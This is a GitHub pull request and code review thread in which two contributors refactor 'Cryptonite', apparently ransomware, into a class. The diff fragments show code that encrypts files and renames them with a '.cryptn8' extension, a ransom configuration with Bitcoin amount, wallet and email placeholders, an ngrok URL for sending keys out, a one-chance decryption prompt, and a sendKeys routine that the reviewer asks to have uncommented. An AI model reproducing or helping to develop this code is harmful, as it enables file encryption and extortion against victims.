### PR TITLE
feat: Implemented OOPS for Cryptonite

### PR DESCRIPTION
**Pull request by P0intMaN**
issue #5

### CODE REVIEW

**Review by CYBERDEVILZ — CHANGES_REQUESTED** [review]
**Minor Changes required**
* Comments are a bit offset. I will mark them in the file.
* Uncomment sendkeys
* add the var EXT in places I mark in the file

File: Cryptonite.py [hunk 1]
```diff
@@ -9,118 +10,146 @@
...
-        newfile = str(file)+".cryptn8"
+class Cryptonite():
+    def __init__(self,key,fe,dkrpt,uniqKey):
+        self.key = key
+        self.fernetEncrypt = fe
+
+        self.decryptPlease = dkrpt
+        self.uniqueKey = uniqKey
+
+              # stores the files to be decrypted
```
Comment (CYBERDEVILZ) [inline Cryptonite.py:43]: offset comment

File: Cryptonite.py [hunk 2]
```diff
@@ -9,118 +10,146 @@
...
+print(dkrpt)
 
-decryptPlease = random.randint(100000, 999999)
-uniqueKey = str(datetime.now().time()).strip().replace(':', '').replace('.', '')
-print(decryptPlease)
-
-url = "YOUR_NGROK_URL_HERE"                             # <----  REQUIRED
 BTC_AMOUNT = 0.03                                       # <----  REQUIRED
 BTC_WALLET = "YOUR_BTC_WALLET_HERE"                     # <----  REQUIRED
 EMAIL = "YOUR_EMAIL_HERE"                               # <----  REQUIRED
```
Comment (CYBERDEVILZ) [inline Cryptonite.py:24]: Add EXT var and initialise it to ".cryptn8"

File: Cryptonite.py (hunk 1 above)
Comment (P0intMaN) [reply Cryptonite.py:43]: alright got it. I am on it now.

File: Cryptonite.py [hunk 3]
```diff
@@ -9,118 +10,146 @@
...
-        if flag == 0:
+            pmb.confirm("Please make sure that you are connected to the internet and try again.", "Network Error")
+            exit()
+
+
+    def encrypt(self):
+        
+        for file in tqdm.tqdm(fileLists):
+            flag = 0
+            newfile = str(file)+".cryptn8"
```
Comment (CYBERDEVILZ) [inline Cryptonite.py:68]: make it EXT

**Comment by P0intMaN** [comment]
Doing it now.

File: Cryptonite.py [hunk 4]
```diff
@@ -9,118 +10,146 @@
...
+
+    def decrypt(self):
+        for files in fileList:
+            flag = 0
             try:
-                with open (file, "wb") as f:
-                    fileList.append(file)
-                    f.write(encryptedData)
-                os.rename(file, newfile)
+                with open(str(files)+".cryptn8", "rb") as f:
```
Comment (CYBERDEVILZ) [inline Cryptonite.py:112]: Make it EXT

File: Cryptonite.py [hunk 5]
```diff
@@ -9,118 +10,146 @@
...
-    OK = pmb.confirm(text=warningMessage, title="Cryptn8", buttons=['I Understood', 'Fuck You!'])
-    if OK == "I Understood":
-        x = pmb.prompt("Decryption key: ", "Enter the Decryption key (ONE CHANCE)")
-        x = int(x)
-        if x == decryptPlease:
-            decrypt()
+                flag = 1
+            if flag == 0:
+                try:
+                    with open(str(files)+".cryptn8", "wb") as f:
```
Comment (CYBERDEVILZ) [inline Cryptonite.py:118]: Make it EXT

File: Cryptonite.py [hunk 6]
```diff
@@ -9,118 +10,146 @@
...
+
 if __name__ == "__main__":
     
-    sendKeys()
-    findFiles()
-    warningScreen()
+    cryptn8 = Cryptonite(key,fe,dkrpt,uniqKey)
+    window = System(key,fe,dkrpt,uniqKey)
+
+    # cryptn8.sendKeys()
```
Comment (CYBERDEVILZ) [inline Cryptonite.py:153]: Uncomment this

**Comment by CYBERDEVILZ** [comment]
Do one thing.. Better start a new pull request. It is getting messy around here. I am closing it for now.

**Comment by P0intMaN** [comment]
Yeah I messed up too, I am forking again.

**Pull request closed without merging**